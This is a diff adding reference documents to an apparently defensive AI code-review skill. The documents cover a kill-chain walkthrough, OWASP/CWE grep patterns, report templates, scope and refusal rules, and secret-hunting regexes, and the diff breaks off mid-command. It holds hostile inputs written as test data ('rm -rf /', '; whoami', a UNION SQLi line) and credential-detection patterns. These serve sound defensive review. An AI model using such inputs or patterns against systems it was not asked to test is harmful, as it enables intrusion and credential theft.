+- Is the input normalized before the check?
+- Are symlinks resolved before the check?
+- Are uploads stored with original filenames?
+```
+
+#### XSS (CWE-79)
+
+```
+- Is anywhere using innerHTML / dangerouslySetInnerHTML?
+- Is template auto-escape disabled?
+- Is markdown rendered without sanitization (DOMPurify, etc)?
+- Are user-provided URLs rendered as href without javascript: scheme check?
+```
+
+#### CSRF (CWE-352)
+
+```
+- Mutating routes — do they require a CSRF token / SameSite=strict cookie / non-cookie auth?
+- Is the cookie SameSite=lax (vulnerable to top-level GET-able mutations)?
+- Are CORS headers permissive (Access-Control-Allow-Credentials with wildcard origin)?
+```
+
+#### Race conditions (CWE-362, CWE-367)
+
+```
+- Check-then-act on shared state? (TOCTOU)
+- Are ledger / payment writes idempotent?
+- Are concurrent updates protected by optimistic locking / row locks?
+- Are file operations protected against TOCTOU symlink swaps?
+```
+
+#### Secrets (CWE-798, CWE-532)
+
+```
+- Hardcoded keys, tokens, passwords in source?
+- Secrets in error messages, stack traces, logs?
+- Secrets in git history (gitleaks --log-opts="--all")?
+- .env committed?
+- Secrets in client bundles (window.__INITIAL_STATE__)?
+- Secrets in CI logs?
+```
+
+#### Supply chain (CWE-1357, CWE-829)
+
+```
+- Lockfile committed?
+- postinstall / preinstall hooks in deps?
+- Recently published deps with low download count? (typo-squat)
+- Any deps with known CVEs (npm audit / osv-scanner)?
+- Vendored binaries / scripts not audited?
+```
+
+### Stop condition
+
+For each candidate from Phase 2: a verdict (Confirmed / Refuted / Need-more-context). No "I'll come back to it" — either it's a finding or it's refuted.
+
+## Phase 5 — Exploit Chain (Detail)
+
+See `kill-chain.md`. Goal: turn each Confirmed finding into a chain showing real-world impact.
+
+### Stop condition
+
+Each Confirmed finding has a chain (recon → ... → final action) OR is documented as standalone (single-step impact).
+
+## Phase 6 — Impact (Detail)
+
+DREAD-lite or CVSS v3 per chain. Score is **per-chain**, not per-bug — a "low" bug in a chain that grants RCE is part of a critical chain.
+
+### Stop condition
+
+Every chain has a numeric score + qualitative tier (Low / Medium / High / Critical).
+
+## Phase 7 — Report + Remediate (Detail)
+
+See `reporting.md` for the writeup format.
+
+Remediation must include:
+
+- **Specific** code change (diff or pseudo-diff).
+- **Defense-in-depth**: at least one secondary control if primary fails.
+- **Regression test**: a test that fails before fix, passes after.
+- **Verification**: how to confirm the fix in the running system.
+
+### Stop condition
+
+Every Confirmed finding has all four remediation elements OR has an explicit "accepted risk" decision recorded by the user.
+
+## Cross-Phase Rule
+
+If at any phase you find yourself reasoning *defensively* ("this is probably fine"), **stop and re-frame adversarially**. Defensive reasoning produces missed findings. Defensive thinking returns in Phase 7 (remediation) — never before.

--- a/red-team/references/kill-chain.md
+++ b/red-team/references/kill-chain.md
@@ -1,0 +1,123 @@
+# Kill Chain — Lockheed + MITRE ATT&CK
+
+Single bugs are interesting. Chains are dangerous. This reference turns a confirmed finding into a real-world impact narrative.
+
+## Lockheed Kill Chain (7 stages)
+
+```
+RECON  →  WEAPONIZE  →  DELIVERY  →  EXPLOIT  →  INSTALL  →  C2  →  ACTIONS
+```
+
+| Stage | Question | Code-review answer |
+|-------|----------|--------------------|
+| **Recon** | How does the attacker discover this? | Public endpoint? Error messages reveal stack? Version disclosed in headers? |
+| **Weaponize** | What input triggers it? | The minimum payload that exercises the bug. |
+| **Delivery** | How does the input arrive? | Endpoint, queue, file upload, email, supply chain? |
+| **Exploit** | What primitive does it grant? | Read / write / exec / auth-bypass / info-disclosure |
+| **Install** | How does the attacker persist? | Backdoor account, scheduled job, modified file, compromised dep |
+| **C2** | How does the attacker control it? | Reverse shell, periodic poll, DNS tunnel |
+| **Actions** | What's the final goal? | Exfil customer data, ransom, lateral, crypto-mine |
+
+A **chain** strings several of these together via vulnerabilities.
+
+## MITRE ATT&CK Mapping
+
+For each chain step, map to ATT&CK technique IDs (sample — full list at attack.mitre.org):
+
+| Stage | Tactic | Common techniques |
+|-------|--------|-------------------|
+| Recon | TA0043 Reconnaissance | T1595 Active Scanning, T1592 Gather Victim Host |
+| Initial access | TA0001 Initial Access | T1190 Exploit Public-Facing App, T1078 Valid Accounts, T1566 Phishing |
+| Execution | TA0002 Execution | T1059 Command and Scripting, T1203 Exploitation for Client Execution |
+| Persistence | TA0003 Persistence | T1505 Server Software Component (web shell), T1136 Create Account, T1098 Account Manipulation |
+| Privilege escalation | TA0004 | T1068 Exploitation for Privilege Escalation |
+| Defense evasion | TA0005 | T1070 Indicator Removal, T1027 Obfuscated Files |
+| Credential access | TA0006 | T1003 OS Credential Dumping, T1552 Unsecured Credentials |
+| Discovery | TA0007 | T1083 File and Directory Discovery, T1018 Remote System Discovery |
+| Lateral movement | TA0008 | T1021 Remote Services |
+| Collection | TA0009 | T1005 Data from Local System, T1213 Data from Information Repositories |
+| Exfiltration | TA0010 | T1041 Exfil over C2, T1567 Exfil over Web Service |
+| Impact | TA0040 | T1486 Data Encrypted for Impact, T1485 Data Destruction |
+
+Use these IDs in the report so blue-team / SOC can correlate with detections.
+
+## Worked Example — From SQLi to Full Compromise
+
+Confirmed finding: **SQL injection in `/api/search?q=`** (CWE-89).
+
+### Chain
+
+| # | Stage | Action | Technique |
+|---|-------|--------|-----------|
+| 1 | Recon | Find `/api/search` via crawled JS bundle | T1595.002 Vulnerability Scanning |
+| 2 | Weaponize | Construct UNION-based SQLi payload | — |
+| 3 | Delivery | GET /api/search?q=' UNION SELECT ... -- | T1190 Exploit Public-Facing App |
+| 4 | Exploit | Read `users` table → exfil bcrypt hashes | T1213 Data from Info Repos |
+| 5 | (Offline) | Crack hashes for low-entropy passwords | T1110.002 Password Cracking |
+| 6 | Initial access | Login as admin user | T1078 Valid Accounts |
+| 7 | Persistence | Create new admin account | T1136 Create Account |
+| 8 | Discovery | Read internal docs / S3 buckets | T1083 File Discovery |
+| 9 | Exfiltration | Bulk download customer data | T1041 Exfil over C2 |
+| 10 | Impact | Encrypt + ransom OR sell on market | T1657 Financial Theft |
+
+**Severity**: a SQLi by itself might be scored "high" defensively. The chain shows it's actually **critical** because it ends in customer-data exfil + persistence.
+
+This is the value of chain reasoning: the chain reveals the real impact.
+
+## When to Stop the Chain
+
+Stop the chain at the **first out-of-scope step**. Examples:
+
+- Chain reaches a third-party SaaS — stop, document the boundary, don't probe.
+- Chain reaches customer data — stop, do not exfil even for demonstration.
+- Chain requires social engineering an employee — stop, recommend awareness training.
+
+Replace the rest of the chain with a narrative: *"At this point, an attacker would [continue with X technique], reaching [Y impact]. Mitigation: [Z]."*
+
+## Pre-mortem Variant
+
+For systems not yet built, run the chain **backwards** as a pre-mortem:
+
+```
+Imagine the worst-case incident:
+- Customer data exfil + ransom.
+- 6 months from now.
+
+Walk backwards:
+- HOW did they exfil? (T1041 over C2, S3 misconfig, dev tooling?)
+- HOW did they get persistence? (admin account, web shell, scheduled job?)
+- HOW did they get initial access? (public endpoint, phishing, supply chain?)
+- HOW did they recon? (public assets, leaked secrets, GitHub history?)
+
+Each "HOW" is a layer of defense to add — proactively.
+```
+
+## Output Template
+
+```markdown
+## Exploit Chain: [Finding Title]
+
+**Starting finding**: [link to vuln writeup]
+
+| # | Stage | Tactic / Technique | Action | Evidence (file:line) |
+|---|-------|--------------------|--------|----------------------|
+| 1 | Recon | T1595 | ... | ... |
+| 2 | Delivery | T1190 | ... | ... |
+| ...
+
+**Final impact**: [exfil / ransom / lateral / persistence]
+**Stopped at**: [step N — out of scope OR successful chain]
+**Defenses needed (per stage)**:
+| Stage | Control |
+|-------|---------|
+| Initial access | input validation + WAF rule |
+| Persistence | admin-action audit + alerting |
+| Exfil | DLP + egress filtering + bandwidth alert |
+```
+
+## Anti-Patterns (NEVER)
+
+- NEVER chain into systems out of scope.
+- NEVER produce real exploit payloads in writeups — describe shape, not weaponized code.
+- NEVER leave a chain unscored — chains drive priority.
+- NEVER assume the SOC will catch it. Verify with detection rules per chain step.

--- a/red-team/references/owasp-cwe.md
+++ b/red-team/references/owasp-cwe.md
@@ -1,0 +1,261 @@
+# OWASP Top 10 + CWE Top 25 — Code Patterns + Remediation
+
+Loaded for classification + lookup of code patterns + remediation per category.
+
+## OWASP Top 10 (2021)
+
+| ID | Category | Common CWEs |
+|----|----------|-------------|
+| A01 | Broken Access Control | CWE-22, CWE-285, CWE-639, CWE-862, CWE-863 |
+| A02 | Cryptographic Failures | CWE-261, CWE-310, CWE-321, CWE-327, CWE-330 |
+| A03 | Injection | CWE-77, CWE-78, CWE-79, CWE-89, CWE-94, CWE-643 |
+| A04 | Insecure Design | (design-level, not single CWE) |
+| A05 | Security Misconfiguration | CWE-2, CWE-13, CWE-16, CWE-260, CWE-315, CWE-732 |
+| A06 | Vulnerable & Outdated Components | CWE-1104 |
+| A07 | Identification & Authentication Failures | CWE-287, CWE-294, CWE-303, CWE-384, CWE-521 |
+| A08 | Software & Data Integrity Failures | CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-829 |
+| A09 | Security Logging & Monitoring Failures | CWE-117, CWE-223, CWE-532, CWE-778 |
+| A10 | Server-Side Request Forgery (SSRF) | CWE-918 |
+
+## Per-Category Reference
+
+### A01 — Broken Access Control
+
+**Patterns to find**:
+
+```
+# IDOR — direct object refs from user, no ownership check
+Grep: "findById\\(req\\.params\\.|findOne\\(.*req\\.body\\.id"
+Grep: "WHERE id = \\$1" (without WHERE user_id = ?)
+
+# Missing auth on routes
+Grep: "@app\\.route\\(.*\\)" → for each, check next 5 lines for auth middleware
+
+# Path traversal
+Grep: "path\\.join\\(.*req\\." (not followed by base-dir check)
+Grep: "fs\\.(readFile|createReadStream)\\(.*req\\."
+```
+
+**Remediation**:
+- Check ownership on every resource access: `WHERE id = ? AND owner_id = ?`
+- Centralize authz in middleware / decorator; deny-by-default.
+- Normalize paths; check `resolved.startsWith(base)`.
+
+---
+
+### A02 — Cryptographic Failures
+
+**Patterns**:
+
+```
+Grep: "crypto\\.createHash\\('(md5|sha1)'\\)"     # weak hashes
+Grep: "Math\\.random"                              # not CSPRNG
+Grep: "ECB|DES|RC4"                                # broken ciphers
+Grep: "createCipher\\("                            # deprecated, no IV
+Grep: "jwt\\.sign\\(.+,\\s*['\"][^'\"]{1,20}['\"]" # short JWT secret
+```
+
+**Remediation**:
+- Hashing passwords: argon2id (preferred) / bcrypt (cost ≥ 12) / scrypt.
+- Random tokens: `crypto.randomBytes` (Node), `secrets` (Python), `crypto/rand` (Go).
+- Ciphers: AES-GCM with random IV, or libsodium / age.
+- Long, rotated JWT secrets; or asymmetric (RS256 / EdDSA).
+
+---
+
+### A03 — Injection
+
+**Patterns** (covers SQL, command, XSS, LDAP, NoSQL):
+
+```
+# SQL
+Grep: "query\\(['\"`].+\\$\\{|\\+ req\\."           # template-string SQL with input
+Grep: "raw\\(['\"`].*\\$\\{"                         # ORM raw
+
+# Command
+Grep: "exec\\(.*req\\.|spawn\\(.*shell:\\s*true"
+Grep: "subprocess\\.(call|run)\\(.+shell=True"
+
+# XSS
+Grep: "dangerouslySetInnerHTML|innerHTML\\s*="
+Grep: "v-html"                                       # Vue
+Grep: "{{.*\\| safe }}"                              # Jinja unsafe
+
+# Code injection
+Grep: "\\beval\\(|new Function\\("
+
+# NoSQL injection
+Grep: "\\$where|\\$function"                         # MongoDB
+```
+
+**Remediation**:
+- SQL: parameterized queries (via driver), never string concat. Use prepared statements.
+- Shell: pass argv array, never a shell string. `child_process.execFile([cmd, args])`. Allowlist commands.
+- HTML: rely on framework auto-escape. If raw HTML needed, sanitize via DOMPurify.
+- Code: don't `eval` user input. Ever.
+- NoSQL: typed ORM / query builder; reject `$`-prefixed keys in user input.
+
+---
+
+### A04 — Insecure Design
+
+Design-level. Look for:
+
+- Missing rate limits on sensitive ops (login, password-reset, signup, mutations).
+- No idempotency on payment / mutation endpoints (replay risk).
+- Trust in client-supplied state (e.g. price in cart, role in JWT).
+- Lack of separation between admin and user planes.
+
+**Remediation**: threat modeling per `references/threat-modeling.md`. This isn't fixed by patches.
+
+---
+
+### A05 — Security Misconfiguration
+
+```
+# Permissive CORS
+Grep: "Access-Control-Allow-Origin.*\\*"
+Grep: "cors\\(\\)" without origin allowlist
+
+# Debug / verbose errors in prod
+Grep: "DEBUG\\s*=\\s*True|app\\.config\\['DEBUG'\\]"
+Grep: "stack:.*err\\.stack" in HTTP responses
+
+# Default creds
+Grep: "admin/admin|root/root|postgres/postgres"
+
+# Open buckets / exposed dirs
+Glob: "public/**, static/**" — review for accidental secrets / backups
+```
+
+**Remediation**: env-specific config, deny-by-default network policies, infra-as-code review.
+
+---
+
+### A06 — Vulnerable Components
+
+```
+# Run audits
+Bash: "npm audit --json"
+Bash: "pnpm audit --json"
+Bash: "pip-audit --format json"
+Bash: "osv-scanner --json ."
+
+# Lockfile present?
+Glob: "package-lock.json|pnpm-lock.yaml|yarn.lock|Cargo.lock|go.sum|poetry.lock|Pipfile.lock"
+```
+
+**Remediation**: keep lockfile committed, automate dep updates (Renovate/Dependabot), pin versions, see `references/supply-chain.md`.
+
+---
+
+### A07 — Authentication Failures
+
+```
+# Weak session
+Grep: "express-session" → check store, cookie flags
+Grep: "session_id.*Math\\.random"
+
+# No MFA option for sensitive paths
+Grep: "isAdmin|admin_required" → check for MFA gate
+
+# Credential stuffing not mitigated
+Grep: "/login|signin" → check for rate limits, CAPTCHA on threshold
+
+# Password policy
+Grep: "password.*length.*[0-9]+" → min length, complexity, breach-list check (HIBP)
+```
+
+**Remediation**: secure session lib defaults, MFA on admin + sensitive ops, rate limit per IP+account, breach-list check on password set.
+
+---
+
+### A08 — Software & Data Integrity Failures
+
+```
+# Insecure deserialization
+Grep: "pickle\\.loads|yaml\\.load\\(|unserialize\\("
+Grep: "ObjectInputStream"  # Java
+
+# Unsigned auto-update
+Grep: "fetch.*\\.tar\\.gz|wget|curl" in CI / install scripts — verify signatures?
+
+# Untrusted CDN
+Grep: "<script src=\"http://" → no SRI / wrong protocol
+```
+
+**Remediation**: `yaml.safe_load`, signed updates, Subresource Integrity for CDN scripts.
+
+---
+
+### A09 — Logging & Monitoring Failures
+
+```
+# Sensitive data in logs
+Grep: "log.*password|log.*token|log.*ssn|log.*credit"
+
+# No audit log on sensitive actions
+Grep: "delete\\(" without nearby audit log call
+
+# Errors swallowed
+Grep: "catch.*\\{\\s*\\}" or "catch.*\\{\\s*//.*\\}"
+```
+
+**Remediation**: structured logging with field-level redaction, audit log for mutations, alert on auth failures + privilege changes.
+
+---
+
+### A10 — SSRF
+
+```
+# User-controlled URL fetch
+Grep: "fetch\\(.*req\\.|axios.*req\\.|http\\.(get|request)\\(.*req\\."
+Grep: "urllib\\..*\\(.*req\\.|requests\\.(get|post)\\(.*req\\."
+
+# Cloud metadata fetch reachable?
+Grep: "169\\.254\\.169\\.254|metadata\\.google\\.internal"
+```
+
+**Remediation**: host allowlist; resolve DNS once and pin IP for the request; block link-local / metadata IPs; block redirects to disallowed hosts.
+
+---
+
+## CWE Top 25 (selected high-impact)
+
+| CWE | Name | OWASP |
+|-----|------|-------|
+| CWE-79 | XSS | A03 |
+| CWE-787 | Out-of-bounds Write | (memory-unsafe langs) |
+| CWE-89 | SQL Injection | A03 |
+| CWE-416 | Use After Free | (memory-unsafe) |
+| CWE-78 | OS Command Injection | A03 |
+| CWE-20 | Improper Input Validation | (cross-cutting) |
+| CWE-125 | Out-of-bounds Read | (memory-unsafe) |
+| CWE-22 | Path Traversal | A01 |
+| CWE-352 | CSRF | A01 |
+| CWE-434 | Unrestricted File Upload | A04 |
+| CWE-862 | Missing Authorization | A01 |
+| CWE-476 | NULL Pointer Deref | (memory-unsafe) |
+| CWE-287 | Improper Authentication | A07 |
+| CWE-190 | Integer Overflow | (memory-unsafe) |
+| CWE-502 | Insecure Deserialization | A08 |
+| CWE-77 | Command Injection | A03 |
+| CWE-119 | Buffer Errors | (memory-unsafe) |
+| CWE-798 | Hardcoded Credentials | A07 |
+| CWE-918 | SSRF | A10 |
+| CWE-306 | Missing Auth for Critical Function | A01 |
+| CWE-362 | Race Condition | (varies) |
+| CWE-269 | Improper Privilege Mgmt | A01 |
+| CWE-94 | Code Injection | A03 |
+| CWE-863 | Incorrect Authorization | A01 |
+| CWE-276 | Incorrect Default Permissions | A05 |
+
+## How to Cite in Findings
+
+Always cite CWE + OWASP in finding titles:
+
+```
+## [HIGH] User-controlled URL passed to fetch (CWE-918, OWASP A10:2021)
+```
+
+This makes findings searchable, comparable across teams, and mappable to remediation guides.

--- a/red-team/references/reporting.md
+++ b/red-team/references/reporting.md
@@ -1,0 +1,236 @@
+# Reporting — Severity Scoring + Writeup Template
+
+Phase 7. Loaded when packaging findings into a report or PR comments.
+
+## Severity Models
+
+Pick one. Be consistent within a report.
+
+### DREAD-lite (fast)
+
+| Dimension | Question | 1 | 3 | 5 |
+|-----------|----------|---|---|---|
+| **D**amage | Worst-case impact | minor info leak | data tampering / partial RCE | full RCE / mass data theft |
+| **R**eproducibility | Reliability | rare conditions | sometimes | always |
+| **E**xploitability | Difficulty | expert + custom tooling | scripted / public exploit | one-line curl / nmap |
+| **A**ffected | Blast radius | one user | tenant / segment | all users / cross-tenant |
+| **D**iscoverability | Visibility | source-only | internal logs / error msgs | externally observable |
+
+| Sum | Severity |
+|-----|----------|
+| 5-12 | Low |
+| 13-19 | Medium |
+| 20-25 | High |
+| 23-25 with full chain | Critical |
+
+### CVSS v3 (industry-standard)
+
+Use the [FIRST CVSS calculator](https://www.first.org/cvss/calculator/3.1).
+
+Base metrics:
+- Attack Vector: Network / Adjacent / Local / Physical
+- Attack Complexity: Low / High
+- Privileges Required: None / Low / High
+- User Interaction: None / Required
+- Scope: Unchanged / Changed
+- Confidentiality / Integrity / Availability impact: None / Low / High
+
+Severity bands (base score):
+- 0.1-3.9 Low
+- 4.0-6.9 Medium
+- 7.0-8.9 High
+- 9.0-10.0 Critical
+
+CVSS is preferred for external advisories / CVE assignment. DREAD-lite is fine for internal triage.
+
+## Per-Finding Template
+
+```markdown
+## [SEV] Title (CWE-XXX, OWASP A0X:2021)
+
+**Severity**: <Critical/High/Medium/Low> — <CVSS 3.1: 9.8> or <DREAD: 22/25>
+**Status**: Open / Confirmed / Fix-pending / Fixed
+**Asset affected**: [data store / service / identity]
+**Reporter**: [name / "internal red-team review"]
+**Discovered**: YYYY-MM-DD
+
+---
+
+### Summary
+[One paragraph: what's wrong, why it matters.]
+
+### Affected Code
+- Entry point: `path/file.ts:L23` (e.g. POST /api/run)
+- Sink: `path/file.ts:L88` (e.g. exec(...))
+- Path:
+  1. `file.ts:L23` — req.body.cmd captured
+  2. `processor.ts:L14` — passed unchanged
+  3. `worker.ts:L88` — exec(input) invokes shell
+
+### Exploit Chain (Lockheed)
+| Stage | Action | MITRE |
+|-------|--------|-------|
+| Recon | discover endpoint via JS bundle | T1595 |
+| Delivery | POST malicious cmd | T1190 |
+| Exploit | shell injection → RCE | T1059 |
+| Persist | install web shell | T1505.003 |
+| Exfil | data over C2 | T1041 |
+
+### Proof (Defensive)
+Minimal payload demonstrating the issue. **Do not include weaponized code.**
+
+```http
+POST /api/run HTTP/1.1
+Content-Type: application/json
+
+{"cmd": "id"}
+```
+
+Expected (if vulnerable): response contains output of `id`.
+
+### Root Cause
+[The actual flaw. Not "we forgot to validate" — *why* validation was bypassed.]
+
+E.g.: "child_process.exec invokes a shell. Any string argument is interpolated into the shell, allowing metacharacters to chain commands. The handler accepts arbitrary strings and passes them through."
+
+### Remediation
+
+**Primary fix** (preferred — diff snippet):
+
+```diff
+- import { exec } from 'child_process'
+- exec(req.body.cmd, (err, stdout) => res.send(stdout))
++ import { execFile } from 'child_process'
++ const ALLOWED = new Set(['ls', 'pwd', 'date'])
++ const { cmd, args = [] } = req.body
++ if (!ALLOWED.has(cmd)) return res.status(400).send('disallowed')
++ execFile(cmd, args, (err, stdout) => res.send(stdout))
+```
+
+**Defense in depth**:
+- Run worker as low-priv user.
+- Audit log every command + caller identity.
+- Rate limit + alert on anomaly.
+
+**If fix not feasible**:
+- Compensating control: WAF rule blocking shell metacharacters in body.
+- Sunset timeline: this is a temporary mitigation, not a fix.
+
+### Verification
+
+**Regression test** (add to test suite):
+```ts
+test('rejects disallowed command', async () => {
+  const r = await request(app).post('/api/run').send({ cmd: 'rm -rf /' })
+  expect(r.status).toBe(400)
+})
+
+test('rejects shell metacharacters in args', async () => {
+  const r = await request(app).post('/api/run').send({ cmd: 'ls', args: ['; whoami'] })
+  // execFile passes args[] verbatim — metachars are not interpreted
+  expect(r.status).not.toBe(500)
+})
+```
+
+**Manual verification**:
+- Deploy fix to staging.
+- Re-run the proof from above. Expect 400 / sanitized response.
+- Confirm regression test runs in CI.
+
+### Detection (post-fix)
+
+For SOC / observability:
+- Alert on: 4xx spikes on /api/run.
+- Log: caller identity + command + args, durably.
+- Dashboard: top callers, top commands, error rate.
+
+### Disclosure
+
+- **Internal**: filed in <tracker> ticket #XXX, owner @user.
+- **Coordinated** (if open-source / vendor): <SECURITY.md contact>, embargo until fix released.
+- **Public**: after fix lands + N-day window. CVE if applicable.
+
+### References
+- CWE-78: https://cwe.mitre.org/data/definitions/78.html
+- OWASP A03:2021: https://owasp.org/Top10/A03_2021-Injection/
+- Internal: <link to threat model / DFD>
+```
+
+## Aggregate Report Template
+
+For multi-finding engagements:
+
+```markdown
+# Red-Team Report: [System / Engagement]
+
+**Engagement**: [name]
+**Period**: YYYY-MM-DD → YYYY-MM-DD
+**Reviewer**: [name / "internal red-team review"]
+**Authorization**: [scope reference]
+
+## Executive Summary
+
+[3-5 sentences: posture, top risks, recommended priority. No jargon.]
+
+| Severity | Count | Top Examples |
+|----------|-------|--------------|
+| Critical | X | command injection in /api/run |
+| High | Y | broken access control on admin |
+| Medium | Z | weak password policy |
+| Low | W | verbose error messages |
+
+## Scope
+
+- **In scope**: [list]
+- **Out of scope**: [list]
+- **Method**: code review, no live probes / static analysis only / etc.
+
+## Findings (Ranked)
+
+| ID | Severity | Title | CWE | Status |
+|----|----------|-------|-----|--------|
+| F01 | Critical | Command injection in /api/run | CWE-78 | Open |
+| F02 | High | Missing authz on /admin/users | CWE-862 | Open |
+| ...
+
+[Detailed writeups follow per the per-finding template]
+
+## Top Recommendations (Across Findings)
+
+1. [Highest-leverage change — e.g. "introduce a centralized auth middleware"]
+2. [Second — e.g. "add WAF + rate-limit on all mutating endpoints"]
+3. [Third]
+
+## Threat Model Snapshot
+
+[Brief: assets, top STRIDE risks, mitigations status]
+
+## Compliance Notes
+
+[Only if requested. SOC2 / ISO27001 / PCI controls touched by findings.]
+
+## Appendix
+
+- Tooling versions (semgrep X.Y, gitleaks X.Y, ...)
+- Files reviewed
+- Commits in scope
+- Out-of-scope items deferred
+```
+
+## Severity Anti-Patterns
+
+| Mistake | Why it's wrong | Fix |
+|---------|----------------|-----|
+| Score by CVE base alone | Ignores *your* deployment context | Adjust for reachability + impact in your system |
+| Score "theoretical" High | If unreachable, it's not High *here* | Score by chain that actually fires |
+| Ignore chain | A "Medium" in a chain ending in RCE is part of a Critical | Score the chain, not the bug |
+| No remediation per finding | Findings without fixes don't ship | Every finding gets remediation |
+| No regression test | Fix can decay silently | Test fails before fix, passes after |
+| Public disclosure before fix | Helps attackers | Coordinate disclosure |
+
+## Communication Tone
+
+- **Direct, factual, no drama.** Vulns aren't moral failings.
+- **Evidence-first.** file:line + observable behavior.
+- **Action-oriented.** Each finding ends in a concrete fix.
+- **Respect the team.** They wrote the code; they will write the fix. Findings are a tool, not a verdict.

--- a/red-team/references/scope-and-authorization.md
+++ b/red-team/references/scope-and-authorization.md
@@ -1,0 +1,115 @@
+# Phase 0 — Scope & Authorization (BLOCKING)
+
+This skill performs adversarial reasoning against code. That power is only safe when scoped to systems the user has authorization to test. Phase 0 is a hard gate.
+
+## The 4 Scope Questions
+
+Before any recon:
+
+```
+1. WHAT codebase / system / endpoint?
+   - Path, repo, URL — be specific.
+
+2. WHO authorized this review?
+   - "I own it" (working dir, personal repo, employer's repo with employment scope)
+   - "Written pentest scope" (engagement agreement covers it)
+   - "CTF / training" (boxes designed for this)
+   - "Public bug bounty" (program rules cover it)
+
+3. WHAT is OUT of scope?
+   - Third-party services (payment processors, identity providers, cloud APIs)
+   - Customer data in production
+   - Vendor systems
+   - Anything not in (2)
+
+4. WHAT artifact?
+   - Threat model document
+   - Vuln list with severities
+   - PR comments / inline findings
+   - Internal writeup
+```
+
+If any of (1)-(3) is ambiguous, **stop and ask**. Do not proceed with assumed scope.
+
+## Authorization Matrix
+
+| Target | Default verdict | Required confirmation |
+|--------|-----------------|------------------------|
+| Working directory the user opened | OK | none |
+| Personal GitHub repo, public | OK | none |
+| Personal GitHub repo, private | OK if user provides it | none |
+| Employer's repo, user is employee | OK | one-line confirmation |
+| Customer's codebase via consulting | OK | engagement scope referenced |
+| Open-source project, third-party | OK for read-only review | only public-facing analysis; coordinated disclosure |
+| Random GitHub repo, no relation | **Refuse** | n/a |
+| Live production endpoint, owned | OK for non-destructive | rate limits + auth context |
+| Live production endpoint, third-party | **Refuse** | n/a unless bug-bounty scope |
+| Customer prod data | **Refuse** | even with code access |
+
+## Refusal Triggers (HARD)
+
+The skill **stops and refuses** when:
+
+- Target is a third-party service the user does not own and has not been authorized to test.
+- Goal is to remain undetected on a system the user does not own.
+- Request is for an exploit payload tailored to a named external target.
+- Request is for credential-stuffing / brute-force / DoS infrastructure.
+- Request involves customer or third-party PII without sanitization.
+
+Refusal text template:
+
+```
+I can't help with that as stated. The skill is defensive — for code you own
+or have written authorization to test. If you're working on:
+- Your own code → share the path/repo and I'll proceed.
+- A pentest engagement → confirm scope and I'll work within it.
+- A bug-bounty target → confirm program + scope and I'll work within it.
+- A CTF box → confirm and I'll proceed.
+Otherwise I'd need scope clarification before continuing.
+```
+
+## Soft Pause Triggers
+
+The skill **pauses and asks** (does not refuse) when:
+
+- Scope is plausible but not stated.
+- The chain crosses a trust boundary the user might not own (e.g. their app calls a third-party API — the third-party is out of scope).
+- A finding would be destructive to verify in a live environment.
+
+In these cases, ask once, get clarification, and proceed within the clarified scope.
+
+## Recording Scope
+
+For non-trivial engagements, record at the top of the report:
+
+```markdown
+## Scope
+
+- **Target**: <repo / system>
+- **Authorization**: <how user is authorized — owns / engagement / bounty / CTF>
+- **In scope**: <list>
+- **Out of scope**: <list>
+- **Test type**: code review / static analysis only / no live probes
+- **Disclosure**: private writeup / PR comments / coordinated disclosure
+```
+
+This is a contract with future-you and the user — and a guard against scope creep.
+
+## Coordinated Disclosure
+
+When findings affect software with users / customers:
+
+1. Do **not** post the finding publicly (issues, PRs, chat) until fixed.
+2. Use the project's `SECURITY.md` reporting channel if it exists.
+3. Apply embargo until a fix lands + a release window has passed.
+4. After disclosure, the report can be made public (CVE, advisory).
+
+This skill defaults to private writeup. Public disclosure is an explicit user decision, not the skill's.
+
+## Anti-Patterns (NEVER)
+
+- NEVER assume scope. Confirm in writing (chat counts).
+- NEVER proceed when the chain crosses out-of-scope. Stop, report the boundary, get clarification.
+- NEVER write exploit payloads aimed at named live targets the user does not own.
+- NEVER help bypass detection of a system the user does not own.
+- NEVER include real customer data, real tokens, or real credentials in findings — sanitize or use placeholders.

--- a/red-team/references/secret-hunting.md
+++ b/red-team/references/secret-hunting.md
@@ -1,0 +1,183 @@
+# Secret Hunting
+
+Secrets in code, history, logs, build artifacts, and client bundles. Loaded when user invokes secret hunting or full audit.
+
+## Where Secrets Hide
+
+```
+1. Source code           — string literals
+2. Config files          — .env committed, config.{json,yml,toml}
+3. Git history           — even if removed in latest commit
+4. CI logs               — printed env, secrets in error output
+5. Client bundles        — window.__INITIAL_STATE__, inlined env
+6. Container images      — multi-stage but final layer has secret
+7. Logs                  — "Authorization: Bearer <token>" in HTTP logs
+8. Backups               — pg_dump, S3 snapshots
+9. Test fixtures         — real keys used in tests
+10. Comments             — "// TODO: rotate this prod key"
+```
+
+## Tools (use if installed; fallback to manual Grep)
+
+### gitleaks
+
+```bash
+gitleaks detect --source . --no-banner
+gitleaks detect --source . --log-opts="--all"   # full history
+```
+
+### trufflehog
+
+```bash
+trufflehog filesystem . --no-update
+trufflehog git file://. --no-update             # full history
+```
+
+### detect-secrets
+
+```bash
+detect-secrets scan > .secrets.baseline
+detect-secrets audit .secrets.baseline
+```
+
+If none installed, the skill notes it in the report and proceeds with manual `Grep`.
+
+## Manual Grep Patterns
+
+These are starting points. Each gives false positives; verify by reading.
+
+### Generic high-entropy strings
+
+```
+# Looks like a key (40+ char alnum)
+Grep: "['\"][A-Za-z0-9+/=_-]{40,}['\"]"
+```
+
+### Provider-specific
+
+```
+# AWS
+Grep: "AKIA[0-9A-Z]{16}"                  # access key id
+Grep: "aws_secret_access_key"
+
+# Google
+Grep: "AIza[0-9A-Za-z\\-_]{35}"           # API key
+Grep: "ya29\\."                            # OAuth
+
+# Stripe
+Grep: "sk_(live|test)_[0-9a-zA-Z]{24,}"
+
+# GitHub
+Grep: "ghp_[0-9a-zA-Z]{36}"
+Grep: "github_pat_[0-9a-zA-Z_]{82}"
+
+# Slack
+Grep: "xox[baprs]-[0-9a-zA-Z-]{10,}"
+
+# Generic JWT
+Grep: "eyJ[A-Za-z0-9_-]+\\.[A-Za-z0-9_-]+\\.[A-Za-z0-9_-]+"
+
+# Private key
+Grep: "-----BEGIN (RSA |EC |OPENSSH |PGP |DSA )?PRIVATE KEY"
+```
+
+### Variable-name signals
+
+```
+Grep: "(api_?key|secret|token|password|passwd|pwd|credential)\\s*[:=]\\s*['\"]"
+```
+
+### Env file commits
+
+```
+Glob: ".env, .env.*"   # excluding .env.example
+```
+
+## Git History Search
+
+Even if `.env` was deleted, history retains it:
+
+```bash
+git log --all --pretty=format: --name-only --diff-filter=A | sort -u | grep -E "\\.env$"
+
